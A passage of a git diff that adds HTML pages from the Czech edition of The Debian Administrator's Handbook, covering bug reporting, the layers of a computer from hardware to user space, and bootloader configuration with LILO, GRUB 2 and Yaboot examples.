+            id="id-1.10.5.8.3"
+            class="indexterm"></a><div
+            class="para">
+				If all of your efforts to resolve a problem fail, it is possible that a resolution is not your responsibility, and that the problem is due to a bug in the program. In this case, the proper procedure is to report the bug to Debian or directly to the upstream developers. To do this, isolate the problem as much as possible and create a minimal test situation in which it can be reproduced. If you know which program is the apparent cause of the problem, you can find its corresponding package using the command, <code
+              class="command">dpkg -S <em
+                class="replaceable">file_in_question</em></code>. Check the Bug Tracking System (<code
+              class="literal">https://bugs.debian.org/<em
+                class="replaceable">package</em></code>) to ensure that the bug has not already been reported. You can then send your own bug report, using the <code
+              class="command">reportbug</code> command, including as much information as possible, especially a complete description of those minimal test cases that will allow anyone to recreate the bug.
+			</div><div
+            class="para">
+				The elements of this chapter are a means of effectively resolving issues that the following chapters may bring about. Use them as often as necessary!
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="solving-problems.html"><strong>Předcházející</strong>Kapitola 7. Solving Problems and Finding Relevant...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="basic-configuration.html"><strong>Další</strong>Kapitola 8. Basic Configuration: Network, Account...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html
new file mode 100644
index 000000000..486d61d2a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.computer-layers.html
@@ -0,0 +1,196 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">B.3. Inner Workings of a Computer: the Different Layers Involved</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="BIOS, Kernel, Unix, Process, Hierarchy, Basic Commands" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="short-remedial-course.html"
+        title="Příloha B. Short Remedial Course" /><link
+        rel="prev"
+        href="sect.filesystem-hierarchy.html"
+        title="B.2. Organization of the Filesystem Hierarchy" /><link
+        rel="next"
+        href="sect.kernel-role-and-tasks.html"
+        title="B.4. Some Tasks Handled by the Kernel" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.computer-layers.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.filesystem-hierarchy.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-role-and-tasks.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.computer-layers"></a>B.3. Inner Workings of a Computer: the Different Layers Involved</h2></div></div></div><div
+          class="para">
+			A computer is often considered as something rather abstract, and the externally visible interface is much simpler than its internal complexity. Such complexity comes in part from the number of pieces involved. However, these pieces can be viewed in layers, where a layer only interacts with those immediately above or below.
+		</div><div
+          class="para">
+			An end-user can get by without knowing these details… as long as everything works. When confronting a problem such as, “The internet doesn't work!”, the first thing to do is to identify in which layer the problem originates. Is the network card (hardware) working? Is it recognized by the computer? Does the Linux kernel see it? Are the network parameters properly configured? All these questions isolate an appropriate layer and focus on a potential source of the problem.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.hardware"></a>B.3.1. The Deepest Layer: the Hardware</h3></div></div></div><a
+            id="id-1.21.6.4.2"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.3"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.4"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.5"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.6"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.7"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.8"
+            class="indexterm"></a><a
+            id="id-1.21.6.4.9"
+            class="indexterm"></a><div
+            class="para">
+				Let us start with a basic reminder that a computer is, first and foremost, a set of hardware elements. There is generally a main board (known as the <span
+              class="emphasis"><em>motherboard</em></span>), with one (or more) processor(s), some RAM, device controllers, and extension slots for option boards (for other device controllers). Most noteworthy among these controllers are IDE (Parallel ATA), SCSI and Serial ATA, for connecting to storage devices such as hard disks. Other controllers include USB, which is able to host a great variety of devices (ranging from webcams to thermometers, from keyboards to home automation systems) and IEEE 1394 (Firewire). These controllers often allow connecting several devices so the complete subsystem handled by a controller is therefore usually known as a “bus”. Option boards include graphics cards (into which monitor screens will be plugged), sound cards, network interface cards, and so on. Some main boards are pre-built with these features, and don't need option boards.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Checking that the hardware works</strong></p></div></div></div><div
+              class="para">
+				Checking that a piece of hardware works can be tricky. On the other hand, proving that it doesn't work is sometimes quite simple.
+			</div><div
+              class="para">
+				A hard disk drive is made of spinning platters and moving magnetic heads. When a hard disk is powered up, the platter motor makes a characteristic whir. It also dissipates energy as heat. Consequently, a hard disk drive that stays cold and silent when powered up is broken.
+			</div><div
+              class="para">
+				Network cards often include LEDs displaying the state of the link. If a cable is plugged in and leads to a working network hub or switch, at least one LED will be on. If no LED lights up, either the card itself, the network device, or the cable between them, is faulty. The next step is therefore testing each component individually.
+			</div><div
+              class="para">
+				Some option boards — especially 3D video cards — include cooling devices, such as heat sinks and/or fans. If the fan does not spin even though the card is powered up, a plausible explanation is the card overheated. This also applies to the main processor(s) located on the main board.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.bios"></a>B.3.2. The Starter: the BIOS or UEFI</h3></div></div></div><a
+            id="id-1.21.6.5.2"
+            class="indexterm"></a><a
+            id="id-1.21.6.5.3"
+            class="indexterm"></a><a
+            id="id-1.21.6.5.4"
+            class="indexterm"></a><div
+            class="para">
+				Hardware, on its own, is unable to perform useful tasks without a corresponding piece of software driving it. Controlling and interacting with the hardware is the purpose of the operating system and applications. These, in turn, require functional hardware to run.
+			</div><div
+            class="para">
+				This symbiosis between hardware and software does not happen on its own. When the computer is first powered up, some initial setup is required. This role is assumed by the BIOS or UEFI, a piece of software embedded into the main board that runs automatically upon power-up. Its primary task is searching for software it can hand over control to. Usually, in the BIOS case, this involves looking for the first hard disk with a boot sector (also known as the <span
+              class="emphasis"><em>master boot record</em></span> or <acronym
+              class="acronym">MBR</acronym>), loading that boot sector, and running it. From then on, the BIOS is usually not involved (until the next boot). In the case of UEFI, the process involves scanning disks to find a dedicated EFI partition containing further EFI applications to execute.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Setup, the BIOS/UEFI configuration tool</strong></p></div></div></div><a
+              id="id-1.21.6.5.7.2"
+              class="indexterm"></a><div
+              class="para">
+				The BIOS/UEFI also contains a piece of software called Setup, designed to allow configuring aspects of the computer. In particular, it allows choosing which boot device is preferred (for instance, the floppy disk or CD-ROM drive), setting the system clock, and so on. Starting Setup usually involves pressing a key very soon after the computer is powered on. This key is often <span
+                class="keycap"><strong>Del</strong></span> or <span
+                class="keycap"><strong>Esc</strong></span>, sometimes <span
+                class="keycap"><strong>F2</strong></span> or <span
+                class="keycap"><strong>F10</strong></span>. Most of the time, the choice is flashed on screen while booting.
+			</div></div><div
+            class="para">
+				The boot sector (or the EFI partition), in turn, contains another piece of software, called the bootloader, whose purpose is to find and run an operating system. Since this bootloader is not embedded in the main board but loaded from disk, it can be smarter than the BIOS, which explains why the BIOS does not load the operating system by itself. For instance, the bootloader (often GRUB on Linux systems) can list the available operating systems and ask the user to choose one. Usually, a time-out and default choice is provided. Sometimes the user can also choose to add parameters to pass to the kernel, and so on. Eventually, a kernel is found, loaded into memory, and executed.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> UEFI, a modern replacement to the BIOS</strong></p></div></div></div><a
+              id="id-1.21.6.5.9.2"
+              class="indexterm"></a><a
+              id="id-1.21.6.5.9.3"
+              class="indexterm"></a><div
+              class="para">
+				UEFI is a relatively recent development. Most new computers will support UEFI booting, but usually they also support BIOS booting alongside for backwards compatibility with operating systems that are not ready to exploit UEFI.
+			</div><div
+              class="para">
+				This new system gets rid of some of the limitations of BIOS booting: with the usage of a dedicated partition, the bootloaders no longer need special tricks to fit in a tiny <span
+                class="emphasis"><em>master boot record</em></span> and then discover the kernel to boot. Even better, with a suitably built Linux kernel, UEFI can directly boot the kernel without any intermediary bootloader. UEFI is also the basic foundation used to deliver <span
+                class="emphasis"><em>Secure Boot</em></span>, a technology ensuring that you run only software validated by your operating system vendor.
+			</div></div><div
+            class="para">
+				The BIOS/UEFI is also in charge of detecting and initializing a number of devices. Obviously, this includes the IDE/SATA devices (usually hard disk(s) and CD/DVD-ROM drives), but also PCI devices. Detected devices are often listed on screen during the boot process. If this list goes by too fast, use the <span
+              class="keycap"><strong>Pause</strong></span> key to freeze it for long enough to read. Installed PCI devices that don't appear are a bad omen. At worst, the device is faulty. At best, it is merely incompatible with the current version of the BIOS or main board. PCI specifications evolve, and old main boards are not guaranteed to handle newer PCI devices.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel"></a>B.3.3. The Kernel</h3></div></div></div><div
+            class="para">
+				Both the BIOS/UEFI and the bootloader only run for a few seconds each; now we are getting to the first piece of software that runs for a longer time, the operating system kernel. This kernel assumes the role of a conductor in an orchestra, and ensures coordination between hardware and software. This role involves several tasks including: driving hardware, managing processes, users and permissions, the filesystem, and so on. The kernel provides a common base to all other programs on the system.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.userspace-presentation"></a>B.3.4. The User Space</h3></div></div></div><div
+            class="para">
+				Although everything that happens outside of the kernel can be lumped together under “user space”, we can still separate it into software layers. However, their interactions are more complex than before, and the classifications may not be as simple. An application commonly uses libraries, which in turn involve the kernel, but the communications can also involve other programs, or even many libraries calling each other.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.filesystem-hierarchy.html"><strong>Předcházející</strong>B.2. Organization of the Filesystem Hierarchy</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-role-and-tasks.html"><strong>Další</strong>B.4. Some Tasks Handled by the Kernel</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html
new file mode 100644
index 000000000..36d452634
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.config-bootloader.html
@@ -0,0 +1,374 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.8. Configuring the Bootloader</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.config-printing.html"
+        title="8.7. Printer Configuration" /><link
+        rel="next"
+        href="sect.config-misc.html"
+        title="8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.config-bootloader.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-printing.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-misc.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.config-bootloader"></a>8.8. Configuring the Bootloader</h2></div></div></div><a
+          id="id-1.11.12.2"
+          class="indexterm"></a><a
+          id="id-1.11.12.3"
+          class="indexterm"></a><div
+          class="para">
+			It is probably already functional, but it is always good to know how to configure and install the bootloader in case it disappears from the Master Boot Record. This can occur after installation of another operating system, such as Windows. The following information can also help you to modify the bootloader configuration if needed.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Master boot record</strong></p></div></div></div><a
+            id="id-1.11.12.5.2"
+            class="indexterm"></a><a
+            id="id-1.11.12.5.3"
+            class="indexterm"></a><div
+            class="para">
+			The Master Boot Record (MBR) occupies the first 512 bytes of the first hard disk, and is the first thing loaded by the BIOS to hand over control to a program capable of booting the desired operating system. In general, a bootloader gets installed in the MBR, removing its previous content.
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.identify-disks"></a>8.8.1. Identifying the Disks</h3></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> <span
+                        class="emphasis"><em>udev</em></span> and <code
+                        class="filename">/dev/</code></strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="filename">/dev/</code> directory traditionally houses so-called “special” files, intended to represent system peripherals (see sidebar <a
+                class="xref"
+                href="sect.creating-accounts.html#sidebar.special-files"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</a>). Once upon a time, it used to contain all special files that could potentially be used. This approach had a number of drawbacks among which the fact that it restricted the number of devices that one could use (due to the hardcoded list of names), and that it was impossible to know which special files were actually useful.
+			</div><div
+              class="para">
+				Nowadays, the management of special files is entirely dynamic and matches better the nature of hot-swappable computer devices. The kernel cooperates with <span
+                class="emphasis"><em>udev</em></span> to create and delete them as needed when the corresponding devices appear and disappear. For this reason, <code
+                class="filename">/dev/</code> doesn't need to be persistent and is thus a RAM-based filesystem that starts empty and contains only the relevant entries.
+			</div><div
+              class="para">
+				The kernel communicates lots of information about any newly added device and hands out a pair of major/minor numbers to identify it. With this <code
+                class="command">udevd</code> can create the special file under the name and with the permissions that it wants. It can also create aliases and perform additional actions (such as initialization or registration tasks). <code
+                class="command">udevd</code>'s behavior is driven by a large set of (customizable) rules.
+			</div><div
+              class="para">
+				With dynamically assigned names, you can thus keep the same name for a given device, regardless of the connector used or the connection order, which is especially useful when you use various USB peripherals. The first partition on the first hard drive can then be called <code
+                class="filename">/dev/sda1</code> for backwards compatibility, or <code
+                class="filename">/dev/root-partition</code> if you prefer, or even both at the same time since <code
+                class="command">udevd</code> can be configured to automatically create a symbolic link.
+			</div><div
+              class="para">
+				In ancient times, some kernel modules did automatically load when you tried to access the corresponding device file. This is no longer the case, and the peripheral's special file no longer exists prior to loading the module; this is no big deal, since most modules are loaded on boot thanks to automatic hardware detection. But for undetectable peripherals (such as very old disk drives or PS/2 mice), this doesn't work. Consider adding the modules, <code
+                class="literal">floppy</code>, <code
+                class="literal">psmouse</code> and <code
+                class="literal">mousedev</code> to <code
+                class="filename">/etc/modules</code> in order to force loading them on boot.
+			</div></div><a
+            id="id-1.11.12.6.3"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.4"
+            class="indexterm"></a><div
+            class="para">
+				Configuration of the bootloader must identify the different hard drives and their partitions. Linux uses “block” special files stored in the <code
+              class="filename">/dev/</code> directory, for this purpose. Since Debian <span
+              class="distribution distribution">Squeeze</span>, the naming scheme for hard drives has been unified by the Linux kernel, and all hard drives (IDE/PATA, SATA, SCSI, USB, IEEE 1394) are now represented by <code
+              class="filename">/dev/sd*</code>.
+			</div><div
+            class="para">
+				Each partition is represented by its number on the disk on which it resides: for instance, <code
+              class="filename">/dev/sda1</code> is the first partition on the first disk, and <code
+              class="filename">/dev/sdb3</code> is the third partition on the second disk.
+			</div><a
+            id="id-1.11.12.6.7"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.8"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.9"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.10"
+            class="indexterm"></a><div
+            class="para">
+				The PC architecture (or “i386”, including its younger cousin “amd64”) has long been limited to using the “MS-DOS” partition table format, which only allows four “primary” partitions per disk. To go beyond this limitation under this scheme, one of them has to be created as an “extended” partition, and it can then contain additional “secondary” partitions. These secondary partitions are numbered from 5. Thus the first secondary partition could be <code
+              class="filename">/dev/sda5</code>, followed by <code
+              class="filename">/dev/sda6</code>, etc.
+			</div><div
+            class="para">
+				Another restriction of the MS-DOS partition table format is that it only allows disks up to 2 TiB in size, which is becoming a real problem with recent disks.
+			</div><a
+            id="id-1.11.12.6.13"
+            class="indexterm"></a><a
+            id="id-1.11.12.6.14"
+            class="indexterm"></a><div
+            class="para">
+				A new partition table format called GPT loosens these constraints on the number of partitions (it allows up to 128 partitions when using standard settings) and on the size of the disks (up to 8 ZiB, which is more than 8 billion terabytes). If you intend to create many physical partitions on the same disk, you should therefore ensure that you are creating the partition table in the GPT format when partitioning your disk.
+			</div><div
+            class="para">
+				It is not always easy to remember what disk is connected to which SATA controller, or in third position in the SCSI chain, especially since the naming of hotplugged hard drives (which includes among others most SATA disks and external disks) can change from one boot to another. Fortunately, <code
+              class="command">udev</code> creates, in addition to <code
+              class="filename">/dev/sd*</code>, symbolic links with a fixed name, which you could then use if you wished to identify a hard drive in a non-ambiguous manner. These symbolic links are stored in <code
+              class="filename">/dev/disk/by-id</code>. On a machine with two physical disks, for example, one could find the following:
+			</div><pre
+            class="screen"><code
+              class="computeroutput">mirexpress:/dev/disk/by-id# </code><strong
+              class="userinput"><code>ls -l
+</code></strong><code
+              class="computeroutput">total 0
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 ata-WDC_WD5001AALS-00L3B2_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part1 -&gt; ../../sda1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_STM3500418AS_9VM3L3KP-part2 -&gt; ../../sda2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697 -&gt; ../../sdb
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part1 -&gt; ../../sdb1
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 scsi-SATA_WDC_WD5001AALS-_WD-WCAT00241697-part2 -&gt; ../../sdb2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0 -&gt; ../../sdc
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part1 -&gt; ../../sdc1
+lrwxrwxrwx 1 root root 10 23 jul. 16:48 usb-LaCie_iamaKey_3ed00e26ccc11a-0:0-part2 -&gt; ../../sdc2
+[...]
+lrwxrwxrwx 1 root root  9 23 jul. 08:58 wwn-0x5000c50015c4842f -&gt; ../../sda
+lrwxrwxrwx 1 root root 10 23 jul. 08:58 wwn-0x5000c50015c4842f-part1 -&gt; ../../sda1
+[...]
+mirexpress:/dev/disk/by-id# </code></pre><div
+            class="para">
+				Note that some disks are listed several times (because they behave simultaneously as ATA disks and SCSI disks), but the relevant information is mainly in the model and serial numbers of the disks, from which you can find the peripheral file.
+			</div><div
+            class="para">
+				The example configuration files given in the following sections are based on the same setup: a single SATA disk, where the first partition is an old Windows installation and the second contains Debian GNU/Linux.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-lilo"></a>8.8.2. Configuring LILO</h3></div></div></div><a
+            id="id-1.11.12.7.2"
+            class="indexterm"></a><a
+            id="id-1.11.12.7.3"
+            class="indexterm"></a><div
+            class="para">
+				<span
+              class="emphasis"><em>LILO</em></span> (LInux LOader) is the oldest bootloader — solid but rustic. It writes the physical address of the kernel to boot on the MBR, which is why each update to LILO (or its configuration file) must be followed by the command <code
+              class="command">lilo</code>. Forgetting to do so will render a system unable to boot if the old kernel was removed or replaced as the new one will not be in the same location on the disk.
+			</div><div
+            class="para">
+				LILO's configuration file is <code
+              class="filename">/etc/lilo.conf</code>; a simple file for standard configuration is illustrated in the example below.
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.lilo.conf"></a><p
+              class="title"><strong>Příklad 8.4. LILO configuration file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# The disk on which LILO should be installed.
+# By indicating the disk and not a partition.
+# you order LILO to be installed on the MBR.
+boot=/dev/sda
+# the partition that contains Debian
+root=/dev/sda2
+# the item to be loaded by default
+default=Linux
+
+# the most recent kernel image
+image=/vmlinuz
+  label=Linux
+  initrd=/initrd.img
+  read-only
+
+# Old kernel (if the newly installed kernel doesn't boot)
+image=/vmlinuz.old
+  label=LinuxOLD
+  initrd=/initrd.img.old
+  read-only
+  optional
+
+# only for Linux/Windows dual boot
+other=/dev/sda1
+  label=Windows
+</pre></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-grub"></a>8.8.3. GRUB 2 Configuration</h3></div></div></div><a
+            id="id-1.11.12.8.2"
+            class="indexterm"></a><a
+            id="id-1.11.12.8.3"
+            class="indexterm"></a><div
+            class="para">
+				<span
+              class="emphasis"><em>GRUB</em></span> (GRand Unified Bootloader) is more recent. It is not necessary to invoke it after each update of the kernel; <span
+              class="emphasis"><em>GRUB</em></span> knows how to read the filesystems and find the position of the kernel on the disk by itself. To install it on the MBR of the first disk, simply type <code
+              class="command">grub-install /dev/sda</code>. <a
+              id="id-1.11.12.8.4.4"
+              class="indexterm"></a>
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Disk names for GRUB</strong></p></div></div></div><div
+              class="para">
+				GRUB can only identify hard drives based on information provided by the BIOS. <code
+                class="literal">(hd0)</code> corresponds to the first disk thus detected, <code
+                class="literal">(hd1)</code> the second, etc. In most cases, this order corresponds exactly to the usual order of disks under Linux, but problems can occur when you associate SCSI and IDE disks. GRUB stores correspondences that it detects in the file <code
+                class="filename">/boot/grub/device.map</code>. If you find errors there (because you know that your BIOS detects drives in a different order), correct them manually and run <code
+                class="command">grub-install</code> again. <code
+                class="command">grub-mkdevicemap</code> can help creating a <code
+                class="filename">device.map</code> file from which to start.
+			</div><div
+              class="para">
+				Partitions also have a specific name in GRUB. When you use “classical” partitions in MS-DOS format, the first partition on the first disk is labeled, <code
+                class="literal">(hd0,msdos1)</code>, the second <code
+                class="literal">(hd0,msdos2)</code>, etc.
+			</div></div><div
+            class="para">
+				GRUB 2 configuration is stored in <code
+              class="filename">/boot/grub/grub.cfg</code>, but this file (in Debian) is generated from others. Be careful not to modify it by hand, since such local modifications will be lost the next time <code
+              class="command">update-grub</code> is run (which may occur upon update of various packages). The most common modifications of the <code
+              class="filename">/boot/grub/grub.cfg</code> file (to add command line parameters to the kernel or change the duration that the menu is displayed, for example) are made through the variables in <code
+              class="filename">/etc/default/grub</code>. To add entries to the menu, you can either create a <code
+              class="filename">/boot/grub/custom.cfg</code> file or modify the <code
+              class="filename">/etc/grub.d/40_custom</code> file. For more complex configurations, you can modify other files in <code
+              class="filename">/etc/grub.d</code>, or add to them; these scripts should return configuration snippets, possibly by making use of external programs. These scripts are the ones that will update the list of kernels to boot: <code
+              class="filename">10_linux</code> takes into consideration the installed Linux kernels; <code
+              class="filename">20_linux_xen</code> takes into account Xen virtual systems, and <code
+              class="filename">30_os-prober</code> lists other operating systems (Windows, OS X, Hurd).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-yaboot"></a>8.8.4. For Macintosh Computers (PowerPC): Configuring Yaboot</h3></div></div></div><a
+            id="id-1.11.12.9.2"
+            class="indexterm"></a><div
+            class="para">
+				Yaboot is the bootloader used by old Macintosh computers using PowerPC processors. They do not boot like PCs, but rely on a “bootstrap” partition, from which the BIOS (or OpenFirmware) executes the loader, and on which the <code
+              class="command">ybin</code> program installs <code
+              class="command">yaboot</code> and its configuration file. You will only need to run this command again if the <code
+              class="filename">/etc/yaboot.conf</code> is modified (it is duplicated on the bootstrap partition, and <code
+              class="command">yaboot</code> knows how to find the position of the kernels on the disks).
+			</div><div
+            class="para">
+				Before executing <code
+              class="command">ybin</code>, you must first have a valid <code
+              class="filename">/etc/yaboot.conf</code>. The following is an example of a minimal configuration. <a
+              id="id-1.11.12.9.4.3"
+              class="indexterm"></a>
+			</div><div
+            class="example"><a
+              xmlns=""
+              id="example.yaboot.conf"></a><p
+              class="title"><strong>Příklad 8.5. Yaboot configuration file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# bootstrap partition
+boot=/dev/sda2
+# the disk
+device=hd:
+# the Linux partition
+partition=3
+root=/dev/sda3
+# boot after 3 seconds of inactivity
+# (timeout is in tenths of seconds)
+timeout=30
+
+install=/usr/lib/yaboot/yaboot
+magicboot=/usr/lib/yaboot/ofboot
+enablecdboot
+
+# last kernel installed
+image=/vmlinux
+        label=linux
+        initrd=/initrd.img
+        read-only
+
+# old kernel
+image=/vmlinux.old
+        label=old
+        initrd=/initrd.img.old
+        read-only
+
+# only for Linux/Mac OSX dual-boot
+macosx=/dev/sda5
+
+# bsd=/dev/sdaX and macos=/dev/sdaX
+# are also possible
+</pre></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-printing.html"><strong>Předcházející</strong>8.7. Printer Configuration</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
